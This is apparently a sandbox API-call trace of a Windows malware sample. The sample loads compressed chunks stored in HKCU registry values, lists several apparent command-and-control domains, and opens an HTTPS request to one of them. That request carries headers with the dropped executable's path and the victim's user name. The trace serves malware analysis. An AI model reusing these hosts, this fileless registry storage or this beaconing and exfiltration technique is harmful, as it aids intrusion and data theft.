	[0089.136] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_5", lpReserved=0x0, lpType=0x258fce4, lpData=0x508e70, lpcbData=0x258fcf0*=0x7d000 | out: lpType=0x258fce4*=0x3, lpData=0x508e70*, lpcbData=0x258fcf0*=0x7d000) returned 0x0
	[0089.201] RegCloseKey (hKey=0x1d0) returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] GetLastError () returned 0x0
	[0089.283] wsprintfW (in: param_1=0x258fd40, param_2="%s_%d" | out: param_1="gpscsdch_6") returned 10
	[0089.283] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fcf0, lpdwDisposition=0x0 | out: phkResult=0x258fcf0*=0x1f8, lpdwDisposition=0x0) returned 0x0
	[0089.283] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_6", lpReserved=0x0, lpType=0x258fce4, lpData=0x0, lpcbData=0x258fcf0*=0x0 | out: lpType=0x258fce4*=0x3, lpData=0x0, lpcbData=0x258fcf0*=0x7d000) returned 0x0
	[0089.288] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_6", lpReserved=0x0, lpType=0x258fce4, lpData=0x508e70, lpcbData=0x258fcf0*=0x7d000 | out: lpType=0x258fce4*=0x3, lpData=0x508e70*, lpcbData=0x258fcf0*=0x7d000) returned 0x0
	[0089.304] RegCloseKey (hKey=0x1f8) returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] GetLastError () returned 0x0
	[0089.451] wsprintfW (in: param_1=0x258fd40, param_2="%s_%d" | out: param_1="gpscsdch_7") returned 10
	[0089.451] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fcf0, lpdwDisposition=0x0 | out: phkResult=0x258fcf0*=0x1f8, lpdwDisposition=0x0) returned 0x0
	[0089.451] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_7", lpReserved=0x0, lpType=0x258fce4, lpData=0x0, lpcbData=0x258fcf0*=0x0 | out: lpType=0x258fce4*=0x3, lpData=0x0, lpcbData=0x258fcf0*=0x55832) returned 0x0
	[0089.454] RegQueryValueExW (in: hKey=0x1f8, lpValueName="gpscsdch_7", lpReserved=0x0, lpType=0x258fce4, lpData=0x508e70, lpcbData=0x258fcf0*=0x55832 | out: lpType=0x258fce4*=0x3, lpData=0x508e70*, lpcbData=0x258fcf0*=0x55832) returned 0x0
	[0089.466] RegCloseKey (hKey=0x1f8) returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] GetLastError () returned 0x0
	[0089.566] wsprintfW (in: param_1=0x258fd40, param_2="%s_%d" | out: param_1="gpscsdch_8") returned 10
	[0089.566] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fcf0, lpdwDisposition=0x0 | out: phkResult=0x258fcf0*=0x1d8, lpdwDisposition=0x0) returned 0x0
	[0089.566] RegQueryValueExW (in: hKey=0x1d8, lpValueName="gpscsdch_8", lpReserved=0x0, lpType=0x258fce4, lpData=0x0, lpcbData=0x258fcf0*=0x0 | out: lpType=0x258fce4*=0x0, lpData=0x0, lpcbData=0x258fcf0*=0x0) returned 0x2
	[0089.567] RegCloseKey (hKey=0x1d8) returned 0x0
	[0089.567] RegCloseKey (hKey=0x1f4) returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] GetLastError () returned 0x0
	[0089.567] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0089.568] GetProcAddress (hModule=0x77960000, lpProcName="RtlDecompressBuffer") returned 0x779d6b80
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.633] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.634] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.635] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.636] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.637] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.638] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.639] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.640] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.641] GetLastError () returned 0x0
	[0089.642] GetLastError () returned 0x0
	[0089.642] GetLastError () returned 0x0
	[0089.642] GetLastError () returned 0x0
	[0089.642] GetLastError () returned 0x0
	[0089.642] GetLastError () returned 0x0
	[0089.642] GetLastError () returned 0x0
	[0089.642] GetLastError () returned 0x0
	[0089.642] GetLastError () returned 0x0
	[0089.642] GetLastError () returned 0x0
	[0095.813] lstrcpyA (in: lpString1=0x3e59e90, lpString2="xmpp.dolcesognar.it" | out: lpString1="xmpp.dolcesognar.it") returned="xmpp.dolcesognar.it"
	[0095.813] lstrcpyA (in: lpString1=0x3e59eb0, lpString2="xmpp.dolcesognar.it" | out: lpString1="xmpp.dolcesognar.it") returned="xmpp.dolcesognar.it"
	[0095.813] lstrcpyA (in: lpString1=0x3e59ed0, lpString2="spop.lestanzedifederica.com" | out: lpString1="spop.lestanzedifederica.com") returned="spop.lestanzedifederica.com"
	[0095.813] lstrcpyA (in: lpString1=0x3e59ef0, lpString2="arb.palaser.eu" | out: lpString1="arb.palaser.eu") returned="arb.palaser.eu"
	[0095.813] lstrcpyA (in: lpString1=0x3e59f10, lpString2="gttopr.space" | out: lpString1="gttopr.space") returned="gttopr.space"
	[0095.813] OutputDebugStringA (lpOutputString="WMA 1") 
	[0095.827] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x258f910 | out: phkResult=0x258f910*=0x1f4) returned 0x0
	[0095.828] RegQueryValueExW (in: hKey=0x1f4, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x258f914*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x258f914*=0x4) returned 0x0
	[0095.828] RegQueryValueExW (in: hKey=0x1f4, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x4fb938, lpcbData=0x258f914*=0x4 | out: lpType=0x0, lpData=0x4fb938*=0x0, lpcbData=0x258f914*=0x4) returned 0x0
	[0095.828] RegCloseKey (hKey=0x1f4) returned 0x0
	[0095.828] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0095.991] InternetConnectA (hInternet=0xcc0004, lpszServerName="xmpp.dolcesognar.it", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008
	[0095.991] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/rbody320", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84800300, dwContext=0x0) returned 0xcc000c
	[0095.996] wsprintfW (in: param_1=0x259e140, param_2="X-File-Name: %s" | out: param_1="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0095.996] lstrlenW (lpString="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0095.996] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwHeadersLength=0x41, dwModifiers=0x10000000) returned 1
	[0095.996] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x259e558, nSize=0x258f2f4 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x258f2f4) returned 0x1
	[0095.997] wsprintfW (in: param_1=0x259e140, param_2="X-User-Name: %s" | out: param_1="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0095.997] lstrlenW (lpString="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0095.997] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Name: X2VS1CUM\\Nd9E1FYi", dwHeadersLength=0x1e, dwModifiers=0x10000000) returned 1
	[0095.997] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x258f2fc | out: phkResult=0x258f2fc*=0x294) returned 0x0
	[0095.997] RegQueryValueExW (in: hKey=0x294, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x258f2d4*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x258f2d4*=0x0) returned 0x2
